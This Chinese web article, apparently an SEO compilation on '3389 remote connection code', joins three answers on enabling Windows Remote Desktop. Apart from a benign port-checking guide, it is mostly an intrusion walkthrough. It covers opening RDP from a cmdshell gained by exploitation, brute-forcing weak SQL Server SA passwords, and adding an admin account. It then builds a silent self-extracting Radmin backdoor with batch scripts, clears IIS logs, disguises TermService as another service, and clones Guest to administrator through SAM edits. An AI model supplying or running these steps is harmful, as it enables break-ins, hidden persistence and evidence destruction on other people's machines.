3389远程连接代码的简单介绍

今天给各位分享3389远程连接代码的知识，其中也会对进行解释，如果能碰巧解决你现在面临的问题，别忘了关注本站，现在开始吧！

本文目录一览：

• 1、怎么样在cmd中开启3389端口和远程服务？
• 2、如何用一句cmd命令开启3389端口..也就是开启远程桌面
• 3、扫到3389端口怎么做我要远程控制

怎么样在cmd中开启3389端口和远程服务？

相对于2000的系统来说，2003cmdshell下开启远程桌面服务就比较容易一些了，起码无需重启嘛！第一种方法也是用"echo"命令写入一个 3389.reg文件，再"regedit /s 3389.reg"导入注册表文件即可开启，比较简单，与上面介绍的2000的开启方法类似。将如下代码一行一行地复制到cmdshell窗口后按回车执行： echo Windows Registry Editor Version 5.00 3389.reg echo. 3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] 3389.reg echo "fDenyTSConnections"=dword:00000000 3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] 3389.reg echo "PortNumber"=dword:00000d3d 3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] 3389.reg echo "PortNumber"=dword:00000d3d 3389.reg 完成以上操作后再执行"regedit /s 3389.reg"导入即可生效！不过这个方法相对来说比较麻烦，也比较复杂一些。我们还可以用另外一种比较简单的方法来开启远程桌面服务的，嘿嘿。在介绍另一个操作方法之前，我们先来熟悉下2003系统下远程桌面服务的一个最关键的注册表键值。在"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"下数值名称为"fDenyTSConnections"的这一项，可以看到它的数值数据为1或0。数值为1的时候关闭远程桌面服务，数值为0的时候开启远程桌面服务。换句话说，我们只要可以在cmdshell下更改这个关键的注册表键值数据就可以达到实现开启远程桌面服务的目的了！有幸的是，在2003下有一个"reg"命令完全可以做到这一点，嘿嘿。这里我们找一台操作系统为2003的服务器，通过和上面介绍的同样方法溢出后返回一个cmdshell，如图5。当我们尝试连接的时候会发现根本无法连接上去，如图6。下面详细说明一下用"reg"命令开启远程桌面服务。执行：reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" 我们发现"fDenyTSConnections"键值数据为"0x1"，如图7。这个是十六进制数的1。上面提到，数据为1则没有开启远程桌面服务。我们要做的就是把"0x1"改成"0x0"！直接用"reg add"是不行的，必须把原来键值删掉再添加！在cmdshell下执行： reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections 会询问是否"要删除注册表值 fDenyTSConnections 吗"，当然Yes了，如图8。再执行： reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0提示操作成功完成，如图9。这样就把"fDenyTSConnections"的值改为"0x0"了，我们可以执行： reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"我们可以查看一下，看看是不是真的改掉了，发现已经成功更改了数据，如图10。现在再来连接服务器的3389看看，发现已经可以成功连接上了，加个用户进去参观咯，如图11。至此2003下cmdshell开启远程桌面服务的方法也介绍完了。

如何用一句cmd命令开启3389端口..也就是开启远程桌面

1、打开cmd命令行，在cmd命令行下输入：tasklist/svc在输出的内容中查找svchost.exe进程下termservice服务对应的PID，在此查看的PID为：1336

2、然后输入命令：netstat-ano找到对应PID就能找到对应远程端口，在此远程端口为3389端口

3、如此方式不可用，可在注册表中查看：在运行框中输入：regedit打开注册表，找到以下路径中的PortNumber文件，双击选择十进制可查看或修改端口。

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp\PortNumber]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp\PortNumber]

4、在此将远程端口修改为33899，使用tasklist/svc查看PID，因主机重启过，在此查看对应PID为：1260。

5、使用netstat-ano查看对应端口，在此找到对应的端口为修改后的端口33899。

6、远程测试成功如图：

扫到3389端口怎么做我要远程控制

一.扫到SA弱口令..(自动攻击器)

二.用SQLTOOLS连上去建一个用户

net start telnet 开telnet服务

net user mint mint /add 添加用户mint密码为mint

net localgroup administrators mint /add 将帐号mint升级为管理员

三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)

制作RAD.EXE过程:

1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe(从新

2、在本地设置服务端（一定要生成）

设置密码--设置连接端口(默认4489)--生成

3、导出注册表HKEY_LOCAL_MACHINE\SYSTEM\Radmin的键值为1.reg

4、编写一个批处理，并命名为u.bat

--------------------------------------------

@echo off

net stop r_server

--------------------------------------------

5、写第二个批处理，r.bat,内容为

--------------------------------------------

@echo off

@Explorer.exe /uninstall /silence

@Explorer.exe /install /silence

@regedit /s 1.reg

@echo off

@Explorer.exe /uninstall /silence

@Explorer.exe /install /silence

@regedit /s 1.reg

@net start r_server

@del rad.exe

@del 1.reg

@del r.bat

@del u.bat

--------------------------------------------

6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包

7、将Rad.rar制作成自解压文件.

选择Default.sfx的自释放模块--高级自释放选项

--常规

释放路径:%systemroot%\system32

安装程序:释放后运行:r.bat 释放前运行u.bat

--摸式

缄默模式:全部隐藏 覆盖方式:覆盖所有文件

--确定--确定

生成完成

四.用RADMIN客服端连接....

上传文件到c:\WINNT(XP是windows):

port.bat(如果是在XP下..这个要把里面的WINNT改为Windows)

query.exe quser.exe

SC.exe

CleanIISLog.exe.exe

3389.exe

(这里加上手工命令开3389:

还是先确定系统:type c:\boot.ini

dir c:\sysoc.inf /s

dir c:\sysocmgr.* /s

echo [Components] c:\wawa

echo TSEnable = on c:\wawa

type c:\wawa

sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q

psu.exe

最好再上传一个反弹后门

RADMIN进入TELNET

运行 c:\winnt\3389.exe

重启肉鸡

五.重启后用远程桌面远程器连上去

这里就有时会出现个问题..

使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。

telnet对方ip。发现需要NTLM 身份验证。

我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

找到c:\winnt\system32\cmd.exe 建立一个快捷方式到桌面。

修改cmd的快捷方式属性为允许其他身份登陆。

然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint

telnet对方ip.直接可以登陆对方电脑了。

使用命令

c:\query user (查看对方目前终端登陆状况。)

运行命令

c:\logoff 1(踢出去一个管理者)

再用c:\query user检查一便~~(这就是为什么不马上用1.bat了)

六.连上后..在cmd下运行

c:\winnt\log . 自己的IP .(擦PP)

c:\winnet\1.bat (删除覆盖查看当前在线用户文件)

七.打SA空口令补丁

程序--Microsoft SQL Server--查询分析器(有放大镜的)

--Windowst身位验证登陆

复制一下代码:SELMIS

if exists (select * from

dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and

OBJECTPROPERTY(id, N'IsExtendedProc') = 1)

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

GO

--------------------------------------------

按F5(运行)

关了退出SQL Server再用SQL Server身位验证进一次.退出(这是为了不留下记录)

八.改3389端口和服务名称

修改服务器端的端口设置 ，注册表有2个地方需要修改。

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal

Server\Wds\rdpwd\Tds\tcp]

PortNumber值，默认是3389，选择10进制 修改成所希望的端口，比如1314

第二个地方：

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-

Tcp]　

PortNumber值，默认是3389，选择10进制 修改成所希望的端口，比如1314

要重启系统才能用新端口连.(不急..改了他的服务名再重启系统吧)

导出3389服务的

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]

的键值为mm.reg文件.

编辑mm.reg文件.替换TermService为Alerter(错误警告服务..别的服务也行)

再把第十行的"Description"="(这里是服务说明..改为你所换的服务说明..这里改为通知所选用户和计算

机有关系统管理级警报。)"

第十一行的"DisplayName"="(这里是服务名称..改为你所换的服务名称..这里改为Alerter)

保存..再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..把Alerter的服务先

停止)

再在CMD下

CD c:\winnt\system32

copy termsrv.exe service.exe(这里是复制termsrv.exe为Alerter服务文件名差不多的文件)

CD C:\winnt

sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe(这里是从新定向Alerter

服务文件.服务名一定要区分大小写A要大写)

九.注消后(注消比直接关要好些)..用Radmin重启肉鸡..

十.使用被禁用的帐户[Guest]登陆.删除自己开始建的帐号

1.使用psu.exe展开注册表到

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

用法：[psu -p regedit -i pid]

Pid 的值为在任务栏空白处点右键--任务管理器---进程中的winlogon.exe后面的数值就是PID数值

如:psu –p regedit –i 157

将Guest克成管理员权限

克成管理员权限的方法:

找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator的类型值.

在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\下找到这个类型值在复制数值名为F的数值数剧

覆盖相应的Guest的类型值(找的方法一样)

导出Guest的配置(也就是导出HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Guest和他相应的类

型值的数据) 然后删除Guest的配置

2.查看计算机管理中帐户列表 刷新这时候会出现错误[找不到帐户](跳过这步也行)

3.将Guest的配置(二个REG文件导进注册表)

4.修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下]

net user Guest **** [修改密码]

net user Guest /active:yes

net user Guest /active:no[命令行下禁用Guest]

5.实验被禁止的帐户Guest是否可用.

6.用Guest登陆后删除自己建的帐号

net user mint /del

3389远程连接代码的介绍就聊到这里吧，感谢你花时间阅读本站内容，更多关于、3389远程连接代码的信息别忘了在本站进行查找喔。